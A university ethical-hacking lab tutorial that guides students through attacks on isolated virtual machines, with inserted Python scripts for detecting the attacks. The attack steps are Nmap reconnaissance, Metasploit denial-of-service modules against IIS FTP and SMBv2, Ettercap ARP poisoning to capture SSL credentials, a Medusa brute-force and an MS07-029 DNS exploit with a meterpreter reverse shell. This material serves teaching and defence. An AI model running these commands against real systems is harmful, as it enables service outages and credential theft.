
UNIVERSITY OF DERBY

Hacking in Action Tutorial


Background

Firstly, thank you for agreeing to participate in this tutorial. The results of this, as well as the survey which you will be asked to complete following this session, will contribute to a dissertation investigating the feasibility of using virtual environments to teach ethical hacking in educational institutions. Hacking is a very delicate subject when studying IT security; however, it is suggested that the best defensive measures can be ensured by learning how to infiltrate and disrupt services. Therefore this tutorial, although highly simplified, will put you in the seat of an ethical attacker who is employed to test the defensive measures in place on a corporate network. The purpose of this is to provide a conceptual understanding of both the mentality and the techniques used by an ethical hacker.

The tutorial will begin by initiating four virtual machines found on the local computer. You will be using a well-recognized suite of tools used by professional security consultants which have been collated to form a Linux distribution known as BackTrack. Once all of the virtual machines have fully loaded, and you have logged into BackTrack, you will use a tool known as Nmap to conduct reconnaissance on the local network in order to determine the IP (Internet Protocol) addresses of hosts connected to the local subnet. Nmap will also be used to discover the Operating System (OS) used by each host, and their respective services (indicated by banners and port numbers). Once the local network is mapped, and sufficient knowledge of each host is ascertained, you will move on to use the Metasploit Framework to conduct four attacks. These attacks will involve:

a. Remotely executing a Denial of Service (DoS) attack on a File Transfer Protocol (FTP) server.
b. Exploiting an out of bounds function table dereference in Server Message Block (SMB) requests, causing a Blue Screen of Death (BSoD).
c. Poisoning Address Resolution Protocol (ARP) requests in order to intercept Secure Sockets Layer (SSL) traffic and obtain a user's credentials, better known as a Man-in-the-Middle (MITM) attack.

1|P a g e


d. Using a brute force tool to discover the password of an administrator account, and then obtaining root access to that server by exploiting a stack buffer overflow in the Remote Procedure Call (RPC) interface of the Microsoft Domain Name System (DNS) service. The root access will then be used to launch a Virtual Network Computing (VNC) session.

This tutorial is designed to be enjoyable, but also educational, and you are reminded that it is a criminal offence to repeat these attacks without written authorisation from the organization and individuals involved. Finally, due to the nature of this study, although the virtual machines are completely isolated and are unable to communicate with the University network or public network, there is monitoring software in use to ensure that any attempts to breach these security measures are logged.


Prelude

To begin, please open the team of virtual machines in VMware Workstation:

1. Click the Windows Start button.

2. Then go to Computer and open the root drive (C:\). Locate and open the StudentVMs folder, followed by STUART BUTCHER and finally, Hacking_Final.

3. The Hacking_Final folder contains all of the virtual machines needed for this tutorial. Begin the tutorial by double clicking the Hacking_Final.vmtm file.

4. You will be greeted with the VMware Workstation application displaying the Hacking_Final team tab. This contains all of the virtual machines.


5. With the team open, click Power on this team in the Commands box. This will start the boot up process.

The servers will start up in a particular order and take approximately 5 minutes before they are ready for use.

6. The virtual machines are ready for use when they display the Press Ctrl-Alt-Delete to logon screen.

To change between virtual machines, select them in the management panel above the console. Please be aware, if you are actively using the virtual machine, i.e. controlling its mouse, you will need to press CTRL + ALT to return to the host.


Reconnaissance

The first task is to determine what else is on the local network and what each active host is responsible for. To do this, we will be using a tool known as Nmap, included with BackTrack.

1. In the VMware Workstation window, take control of the ATTACKER virtual machine by selecting it from the management panel above the console.

2. Click the mouse anywhere on the virtual machine console window to take control of it. You will see a prompt bt login: at the bottom of the window. Type the username attacker and press return. You will be asked for the password, which is attacker.

You will not be able to see the password input. If you enter it incorrectly, you will need to repeat the process.

3. Following successful log on, the graphical user interface will populate and a shell window will automatically appear.


4. If a shell window does not automatically appear, click the Konsole application icon on the bottom menu bar.

5. Before it is possible to discover other devices on the local subnet, the attacker needs to know what subnet they belong to. To do this, type ifconfig eth0 into the shell window. Press return.

6. Take a note of the IP address and subnet mask.

7. The local IP address is set to 172.172.1.10 with a subnet mask of 255.255.255.0. This means that the network address must be 172.172.1.0. Therefore, to discover other devices within the subnet, type sudo nmap -sP 172.172.1.0/24 into the shell window. The sudo command runs the command with administrative privileges and you may therefore be prompted for a password. If this happens, type attacker. Please note, all commands are case sensitive.


8. Nmap has revealed that there are three other clients on the local subnet (one of the hosts identified is BackTrack itself).
   a. 172.172.1.20
   b. 172.172.1.100
   c. 172.172.1.101

9. With the IP addressing information ascertained, it is now possible to acquire brief details of what services each host is responsible for. To do this, type sudo nmap -v -O {Target IP}

10. From the targeted scan, Nmap reveals the Operating System, network interface card MAC address, and open ports. The ports highlight the services running on the target. Repeat the scan for the remaining hosts.

[Screenshot of the targeted Nmap scan, annotated with: open ports; services used by ports; network interface card MAC; operating system information]


11. Although there is now a basic understanding of what ports and services are in use, it is possible to obtain more detailed information by interrogating services. For example, the virtual machine with IP address 172.172.1.101 indicates it is running Internet Information Services (IIS) to power its web server, but it does not advertise which version. To discover the version of IIS, type sudo nmap -A -T4 -F 172.172.1.101. Repeat the scan on the remaining hosts.

With some FTP servers, it is possible to gain specific system information by connecting to the server using Telnet and typing SYST.
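As an added example (not part of the tutorial), the following Python script shows how the ping sweep and the targeted port scans above look to a defender watching connection records; the records, the log format and the thresholds are constructed for the example.

```python
"""Detect the Nmap ping sweep and targeted port scans from the
Reconnaissance section on the defender's side.

Added example, not part of the tutorial. Connection records are
constructed here in a generic (seconds, source IP, destination IP,
destination port) form; a real firewall or IDS feed needs its own
parser. Thresholds and the window size are assumptions.
"""
from collections import defaultdict

# Constructed records. The sweep is modelled as one TCP probe per address
# for simplicity; the -O and -A -F scans as many ports to one destination.
SAMPLE_EVENTS = (
    [(1, "172.172.1.10", f"172.172.1.{n}", 80) for n in range(1, 255)]
    + [(5, "172.172.1.10", "172.172.1.101", p)
       for p in (21, 25, 53, 80, 135, 139, 443, 445, 3389, 8080)]
    # Normal traffic: VICT-CLI01 reading mail from VICT-SRV01.
    + [(7, "172.172.1.20", "172.172.1.100", 443),
       (9, "172.172.1.20", "172.172.1.100", 443)]
)

SWEEP_MIN_HOSTS = 20   # distinct destinations from one source per window
SCAN_MIN_PORTS = 8     # distinct ports to one destination from one source
WINDOW = 10            # seconds per detection bucket


def detect_recon(events, window=WINDOW):
    """Return alerts as (kind, source, destination, distinct_count).

    kind is "sweep" (host discovery across the subnet; destination is
    None) or "portscan" (service enumeration against one host).
    """
    hosts = defaultdict(set)   # (src, bucket) -> destinations contacted
    ports = defaultdict(set)   # (src, bucket, dst) -> ports contacted
    for t, src, dst, port in events:
        bucket = t // window
        hosts[(src, bucket)].add(dst)
        ports[(src, bucket, dst)].add(port)

    alerts = []
    for (src, _bucket), dsts in sorted(hosts.items()):
        if len(dsts) >= SWEEP_MIN_HOSTS:
            alerts.append(("sweep", src, None, len(dsts)))
    for (src, _bucket, dst), ps in sorted(ports.items()):
        if len(ps) >= SCAN_MIN_PORTS:
            alerts.append(("portscan", src, dst, len(ps)))
    return alerts


if __name__ == "__main__":
    for alert in detect_recon(SAMPLE_EVENTS):
        print(alert)
```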


Attacks

With the knowledge now known about the other hosts on the local subnet, it is possible to find vulnerabilities on each. Discovered vulnerabilities are publicised on the National Vulnerability Database in an attempt to help administrators protect their systems and vendors to update their software. Information gathered about each host, and the potential vulnerabilities available to be exploited, are shown below.

172.172.1.20 VICT-CLI01

This host is using Windows XP SP2 or SP3, which may make it vulnerable to relative path stack corruption on the Server service, which could result in obtaining root access, as described in CVE-2008-4250.

172.172.1.100 VICT-SRV01

172.172.1.100 appears to be responsible for DNS, Active Directory, web service, and email. It is also using the Windows Server 2003 Operating System. Therefore, this host may be vulnerable to an exploit of the RPC interface of the DNS service (CVE-2007-1748). Additionally, as this host also appears to be responsible for email services, it could be possible to conduct a Man-In-The-Middle attack on the secure HTTP traffic when a user logs in to their mailbox.


172.172.1.101 VICT-SRV-WEB1

This virtual machine appears to have two interesting services: FTP and HTTP. This suggests that the server is hosting one or more webpages as well as providing a download/upload service for files. Additionally, it is clear that the server is using a Server 2008 based Operating System.

As this host is using IIS 7.0, it is likely that the FTP server is using version 7.5. Therefore, it may be vulnerable to a Denial of Service attack as a result of a heap overflow. Further to this, Nmap has indicated that it is using SMB v2, which is known to be vulnerable to an array index error when an ampersand character is inputted into the Process ID field.

This triggers an attempted dereference of an out of bounds memory location, and consequently results in a Blue Screen of Death (CVE-2009-3103).


IIS FTP 7.5 DoS

It is possible to terminate the FTP service on a Windows server if it is running version 7.5. The vulnerability occurs when the FTP server attempts to encode a portion of an overwritten FTP response when a string of 0xFF bytes has been supplied, even past the end of the heap buffer, resulting in a heap buffer overrun. This can be demonstrated in the Metasploit Framework.

1. Change control of the virtual machines to VICT-SRV-WEB1. If control is currently focused on a different virtual machine, then press CTRL+ALT. This will return control to the host computer.

2. Log in by hitting CTRL+ALT+INSERT and typing H4ckM3! as the password.

3. Once logged in, click the Start button and type services.msc into the search bar, followed by hitting the return key.

4. A window containing all system services will be populated. Scroll through the list of services to find Microsoft FTP Service. It will show the service as Started.

5. Change control back to the ATTACKER virtual machine and open a shell window.

6. Verify that it is possible to connect to the FTP server by typing ftp 172.172.1.101. If the FTP server is running and accepting new connections then it will display the welcome banner (220 Microsoft FTP Service) and will prompt for a login name.

7. Hit return twice and then type quit.

8. Type sudo msfconsole. If prompted for a password, enter attacker. It may take a short while to load.

9. Select the exploit to be used by typing use auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof followed by hitting the return key.

10. Next, select the target by typing set RHOST 172.172.1.101.

11. Launch the attack by typing run.


12. The attack will be launched. A completion message will be returned following the execution.

13. Change back to VICT-SRV-WEB1 and refresh the Services window. Do not close the shell window on BackTrack.

14. Find Microsoft FTP Service and notice that it is no longer Started.

The FTP service is no longer running. The attack has been successful.

Server Message Block (SMB) Blue Screen of Death (BSoD)

The reconnaissance also identified that VICT-SRV-WEB1 uses SMBv2, which has a known vulnerability. This vulnerability allows an attacker to execute code with system-level privileges. Failed exploit attempts result in Denial of Service conditions. This exploit involves purposely failing to execute code with system-level privileges.

1. On BackTrack, from the shell window used previously, type use auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh. If you closed the shell window, open a new window and type sudo msfconsole to start Metasploit again.

2. Set the target by entering set RHOST {Target IP}.

3. Execute the attack by typing run.

4. When the attack completes, change to the VICT-SRV-WEB1 virtual machine.


5. The virtual machine should be displaying a Blue Screen of Death. It is possible to see that the attack dereferenced an out of bounds memory location by examining the error.

6. Return to the ATTACKER and type exit.

The victim will automatically reboot. The attack has been successful.


Secure Sockets Layer (SSL) Man-in-the-Middle Attack

Nmap revealed that there is an XP machine on the network. This is most likely a user's computer. Nmap also identified 172.172.1.100 as the mail server. Therefore, it is possible to sniff traffic and poison ARP packets in order to intercept SSL data by acting as a middle-man.

1. Change control to VICT-CLI01 and press CTRL+ALT+INSERT. Enter thevictim as the username and Password01 as the password.

2. Click the Start button and open Internet Explorer.

3. When the page begins to load, a security alert window will appear. Click View Certificate.


4. The certificate will display three tabs, General, Details, and Certification Path. Open the Details tab.

5. The Details tab contains all of the information relating to the site certificate. Take a note of the Issuer and the information within the text box below.

6. Click OK and then click Yes on the security alert window.


7. Enter the username thevictim and password Password01. Then click Log On.

8. The user's inbox will now be displayed. Click Log Off and then close the window.


10. Change control to the ATTACKER and from within a shell window type sudo ettercap -Tq -i eth0 -M arp:remote,oneway /172.172.1.20/ /172.172.1.100/ . If prompted, enter the password attacker.

11. ARP requests are now being poisoned. Change back to VICT-CLI01. If the virtual machine is locked, press CTRL+ALT+INSERT and type thevictim for the username and Password01 for the password.

12. Click the Start button and open Internet Explorer. When the security alert window displays, click View Certificate.

13. Click the Details tab and take a note of the Issuer.

14. The difference in issuer demonstrates that SSL traffic is being intercepted.

15. Click OK and then Yes to continue loading the web page.


16. Enter the username thevictim and password Password01 on the login page and then click Log On to load the user's inbox.

17. Once successfully logged in, change control back to ATTACKER and notice that the user's details are printed to the display of the shell window.

18. In the shell window, type q and the sniffing and poisoning will terminate.

19. Return to VICT-CLI01 and click Log off. If the virtual machine is locked, enter thevictim as the username and Password01 as the password.

20. Shut down the VICT-CLI01 virtual machine by clicking the Start button and then Shut down. Click OK on the next window.

That concludes the Man-in-the-Middle attack.
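As an added example (not part of the tutorial), the following Python script shows how the ARP poisoning in this section is detected on the network side, complementing the changed certificate issuer that the user sees; the MAC addresses and the reply trace are constructed for the example.

```python
"""Detect the ARP poisoning used in the SSL Man-in-the-Middle section
from the network side.

Added example, not part of the tutorial. The tutorial's user-side signal
is the changed certificate issuer; on the wire the attack shows up as an
IP address being re-announced with a different MAC. MAC addresses and
the reply trace are constructed for the example.
"""
from collections import namedtuple

ArpReply = namedtuple("ArpReply", "sender_ip sender_mac")

# Constructed trace of ARP replies ("<ip> is-at <mac>") on 172.172.1.0/24.
SAMPLE_REPLIES = [
    ArpReply("172.172.1.100", "00:0c:29:aa:00:64"),  # VICT-SRV01, legitimate
    ArpReply("172.172.1.20", "00:0c:29:aa:00:14"),   # VICT-CLI01, legitimate
    ArpReply("172.172.1.10", "00:0c:29:aa:00:0a"),   # ATTACKER (BackTrack)
    ArpReply("172.172.1.20", "00:0c:29:aa:00:14"),   # repeat with same MAC: fine
    ArpReply("172.172.1.100", "00:0c:29:aa:00:0a"),  # .100 now "is at" the attacker MAC
    ArpReply("172.172.1.101", "00:0c:29:aa:00:65"),  # VICT-SRV-WEB1, legitimate
]


def detect_arp_poisoning(replies):
    """Return alerts as (ip, pinned_mac, new_mac, suspect_ip).

    The first MAC seen for each IP is pinned. Any later reply binding
    that IP to a different MAC is reported; if the new MAC is already
    pinned to another IP, that IP is named as the probable source,
    otherwise suspect_ip is None.
    """
    pinned = {}
    alerts = []
    for reply in replies:
        known = pinned.get(reply.sender_ip)
        if known is None:
            pinned[reply.sender_ip] = reply.sender_mac
        elif known != reply.sender_mac:
            suspect = next((ip for ip, mac in pinned.items()
                            if mac == reply.sender_mac), None)
            alerts.append((reply.sender_ip, known, reply.sender_mac, suspect))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES):
        print("ARP conflict:", alert)
```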


Domain Name System (DNS) Remote Procedure Call (RPC) Service Transmission Control Protocol (TCP) Overflow

Nmap identified that the server with IP address 172.172.1.100 is not only an e-mail server, but also responsible for DNS and Active Directory. Unfortunately, Nmap also highlighted that the system is relatively unpatched, and a known vulnerability in that particular OS (and service pack) involves causing a buffer overflow in the RPC interface of the DNS service. This is triggered when a long zone name parameter containing escaped octal strings is supplied in a TCP packet. This will allow root access. However, in order to take control of the server's graphical user interface, the administrator credentials must be known. For this part, it is assumed that the administrator username is Administrator.

1. On the ATTACKER machine, minimise the shell window if there is one open.

2. On the desktop, there is a file titled passwords. Click on it to open it. When prompted, click Open Session.

3. A text file containing a list of passwords will be displayed.

4. Close this window by clicking the X at the top right of the window.

5. Restore the shell window, or open a new one if there was not one already open.


6. Start the brute forcing tool known as Medusa by typing medusa -h 172.172.1.100 -u Administrator -P /home/attacker/passwords -f -F -M smbnt followed by the return key.

7. Medusa will run through all of the passwords in the password text file, checking to see if there is a match. When it finds the correct one, it will display SUCCESS.

8. Take a note of the password and run Metasploit by typing sudo msfconsole. If prompted for the password, type attacker.

9. When Metasploit has loaded, type use exploit/windows/dcerpc/ms07_029_msdns_zonename and hit return.

10. Select the payload type to be used by typing set PAYLOAD windows/meterpreter/reverse_tcp followed by the return key.

11. Define the source address to be used in the reverse Transmission Control Protocol (TCP) connection by typing set LHOST 172.172.1.10.

12. Enter the target address by typing set RHOST 172.172.1.100.

13. Type exploit to execute the attack.


14. If the attack is successful, a session with the server will be established.

15. To view the screen of the server, type run getgui -e.

16. Open a new shell window. When the prompt displays, type rdesktop -u Administrator -p H4ckM3! 172.172.1.100 and press return.

17. Once logged in, click Start followed by Shut Down.


18. It is not possible to shut the server down unless a comment is given. In the comment box, press space and then click OK.

19. The server will warn that other users will be disconnected. Click Yes to continue.

20. The server will now begin the shutdown process. Confirm this by changing control to the VICT-SRV01 virtual machine. When the server shuts down, this attack is completed. In a production environment, the loss of the e-mail server and domain controller would result in major disruption to a business.

Cleaning Up

To complete the tutorial, shut down the remaining virtual machines:

1. Take control of VICT-SRV-WEB1 and press CTRL+ALT+INSERT to log in. Use the username Administrator and password H4ckM3!

2. If asked for a reason why the server unexpectedly shut down, hit the spacebar in the comments box followed by OK.

3. Once logged in, click the Start button followed by the right arrow button next to the padlock icon.

4. When Shut Down becomes visible, click it.


5. If asked for a reason for shut down, press the spacebar in the comments box and click OK.

6. The server will begin the shutdown sequence. Change control to the ATTACKER virtual machine.

7. Close any shell windows that may be open, and click the far left icon on the menu bar.

8. When the panel displays, click Log Out. Another window will appear. Click Log Out on this new window.

9. Once the graphical user interface has closed, click anywhere in the console window to ensure it is taking keyboard input. Type sudo poweroff. When prompted, enter the password attacker.

10. The system will now begin shutting down. When all virtual machines have shut down, the Hacking_Final home tab will be displayed in VMware Workstation.

Thank you for taking part in this investigation. Please complete the online survey. The password for the survey is Attacker.
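As an added example (not part of the tutorial), the following Python script shows how the Medusa password-list attack against the Administrator account in the DNS/RPC section is spotted from logon records on the defender's side; the records, their format and the thresholds are constructed for the example.

```python
"""Spot the Medusa password-list attack on the Administrator account from
the DNS/RPC section in logon records.

Added example, not part of the tutorial. Records are constructed in a
generic (seconds, source IP, account, outcome) form; on VICT-SRV01 the
equivalent data is the Security event log. Threshold and window are
assumptions.
"""
from collections import defaultdict

# Constructed records. Medusa with -f stops after the first valid password,
# so the trace is a burst of failures from one source, then a success.
SAMPLE_LOGONS = (
    [(0, "172.172.1.20", "thevictim", "SUCCESS")]          # normal user logon
    + [(10 + i, "172.172.1.10", "Administrator", "FAILURE") for i in range(12)]
    + [(23, "172.172.1.10", "Administrator", "SUCCESS"),   # guessed password worked
       (30, "172.172.1.20", "thevictim", "FAILURE"),       # one typo, not an attack
       (31, "172.172.1.20", "thevictim", "SUCCESS")]
)

FAILURE_THRESHOLD = 5   # failures per (source, account) within WINDOW
WINDOW = 60             # seconds


def detect_password_guessing(records, threshold=FAILURE_THRESHOLD, window=WINDOW):
    """Return alerts as (source, account, failures, compromised).

    An alert opens once a source has `threshold` failures against one
    account inside the window; its failure count keeps growing, and
    compromised becomes True if a success for the same pair follows
    while failures are still inside the window.
    """
    recent = defaultdict(list)   # (src, account) -> failure timestamps
    open_alert = {}              # (src, account) -> index into alerts
    alerts = []
    for t, src, account, outcome in sorted(records):
        key = (src, account)
        fails = recent[key]
        while fails and t - fails[0] > window:   # expire old failures
            fails.pop(0)
        if outcome == "FAILURE":
            fails.append(t)
            if key in open_alert:
                alerts[open_alert[key]][2] = len(fails)
            elif len(fails) >= threshold:
                open_alert[key] = len(alerts)
                alerts.append([src, account, len(fails), False])
        elif key in open_alert and fails:
            alerts[open_alert[key]][3] = True
    return [tuple(a) for a in alerts]


if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_LOGONS):
        print("password guessing:", alert)
```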